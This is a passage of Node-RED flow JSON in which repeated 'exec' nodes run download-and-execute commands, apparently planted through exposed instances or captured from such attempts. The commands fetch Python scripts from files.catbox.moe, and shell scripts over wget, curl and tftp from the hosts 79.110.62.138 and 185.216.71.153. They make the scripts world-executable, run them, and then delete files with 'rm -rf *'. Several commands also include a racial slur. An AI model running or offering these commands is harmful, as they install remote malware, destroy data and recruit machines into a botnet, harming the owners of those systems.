        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/i38np0.py && python3 i38np0.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O  && python3  && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/uuyf7h.py && python3 uuyf7h.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/j64fce.py && python3 j64fce.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/j64fce.py && python3 j64fce.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/j64fce.py && python3 j64fce.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/j64fce.py && python3 j64fce.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/8emdeq.py && python3 8emdeq.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/j64fce.py && python3 j64fce.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/j64fce.py && python3 j64fce.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/hm2eyr.py && python3 hm2eyr.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/3w2sbq.py && python3 3w2sbq.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/j64fce.py && python3 j64fce.py && a && b && c && d && e && f && g && ssg & niggers && 08hvh && razorblades && applehack",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/spx4dp.py && python3 spx4dp.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl -O https://files.catbox.moe/cgblae.py && python3 cgblae.py && a && b && c && d && e && f && g",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp || cd /run || cd /; wget http://79.110.62.138/eskgbins.sh; chmod 777 eskgbins.sh; sh eskgbins.sh; tftp 79.110.62.138 -c get eskgtftp1.sh; chmod 777 eskgtftp1.sh; sh eskgtftp1.sh; tftp -r eskgtftp2.sh -g 79.110.62.138; chmod 777 eskgtftp2.sh; sh eskgtftp2.sh; rm -rf eskgbins.sh eskgtftp1.sh eskgtftp2.sh; rm -rf *",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp || cd /run || cd /; wget http://79.110.62.138/eskgbins.sh; chmod 777 eskgbins.sh; sh eskgbins.sh; tftp 79.110.62.138 -c get eskgtftp1.sh; chmod 777 eskgtftp1.sh; sh eskgtftp1.sh; tftp -r eskgtftp2.sh -g 79.110.62.138; chmod 777 eskgtftp2.sh; sh eskgtftp2.sh; rm -rf eskgbins.sh eskgtftp1.sh eskgtftp2.sh; rm -rf *",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp || cd /run || cd /; wget http://79.110.62.138/eskgbins.sh; chmod 777 eskgbins.sh; sh eskgbins.sh; tftp 79.110.62.138 -c get eskgtftp1.sh; chmod 777 eskgtftp1.sh; sh eskgtftp1.sh; tftp -r eskgtftp2.sh -g 79.110.62.138; chmod 777 eskgtftp2.sh; sh eskgtftp2.sh; rm -rf eskgbins.sh eskgtftp1.sh eskgtftp2.sh; rm -rf *",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp || cd /run || cd /; wget http://79.110.62.138/eskgbins.sh; chmod 777 eskgbins.sh; sh eskgbins.sh; tftp 79.110.62.138 -c get eskgtftp1.sh; chmod 777 eskgtftp1.sh; sh eskgtftp1.sh; tftp -r eskgtftp2.sh -g 79.110.62.138; chmod 777 eskgtftp2.sh; sh eskgtftp2.sh; rm -rf eskgbins.sh eskgtftp1.sh eskgtftp2.sh; rm -rf *",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp || cd /run || cd /; wget http://79.110.62.138/eskgbins.sh; chmod 777 eskgbins.sh; sh eskgbins.sh; tftp 79.110.62.138 -c get eskgtftp1.sh; chmod 777 eskgtftp1.sh; sh eskgtftp1.sh; tftp -r eskgtftp2.sh -g 79.110.62.138; chmod 777 eskgtftp2.sh; sh eskgtftp2.sh; rm -rf eskgbins.sh eskgtftp1.sh eskgtftp2.sh; rm -rf *",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp || cd /run || cd /; wget http://79.110.62.138/eskgbins.sh; chmod 777 eskgbins.sh; sh eskgbins.sh; tftp 79.110.62.138 -c get eskgtftp1.sh; chmod 777 eskgtftp1.sh; sh eskgtftp1.sh; tftp -r eskgtftp2.sh -g 79.110.62.138; chmod 777 eskgtftp2.sh; sh eskgtftp2.sh; rm -rf eskgbins.sh eskgtftp1.sh eskgtftp2.sh; rm -rf *",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp && curl -O http://79.110.62.138/eskgbins.sh && chmod 777 eskgbins.sh && sh eskgbins.sh && tftp 79.110.62.138 -c get eskgtftp1.sh && chmod 777 eskgtftp1.sh && sh eskgtftp1.sh && tftp -r eskgtftp2.sh -g 79.110.62.138 && chmod 777 eskgtftp2.sh && sh eskgtftp2.sh && rm -rf eskgbins.sh eskgtftp1.sh eskgtftp2.sh && rm -rf *",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp && curl -O http://79.110.62.138/eskgbins.sh && chmod 777 eskgbins.sh && sh eskgbins.sh && tftp 79.110.62.138 -c get eskgtftp1.sh && chmod 777 eskgtftp1.sh && sh eskgtftp1.sh && tftp -r eskgtftp2.sh -g 79.110.62.138 && chmod 777 eskgtftp2.sh && sh eskgtftp2.sh && rm -rf eskgbins.sh eskgtftp1.sh eskgtftp2.sh",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp || cd /run || cd /; wget http://79.110.62.138/eskgbins.sh; chmod 777 eskgbins.sh; sh eskgbins.sh; tftp 79.110.62.138 -c get eskgtftp1.sh; chmod 777 eskgtftp1.sh; sh eskgtftp1.sh; tftp -r eskgtftp2.sh -g 79.110.62.138; chmod 777 eskgtftp2.sh; sh eskgtftp2.sh; rm -rf eskgbins.sh eskgtftp1.sh eskgtftp2.sh; rm -rf *",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp/ && curl -O http://185.216.71.153/bins/bins.sh && chmod +x bins.sh && sh bins.sh",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp/ && curl -O http://185.216.71.153/bins/bins.sh && chmod +x bins.sh && sh bins.sh",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp/ && curl -O http://185.216.71.153/bins/bins.sh && chmod +x bins.sh && sh bins.sh",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp/ && curl -O http://185.216.71.153/bins/bins.sh && chmod +x bins.sh && sh bins.sh",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp/ && curl -O http://185.216.71.153/bins/bins.sh && chmod +x bins.sh && sh bins.sh",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
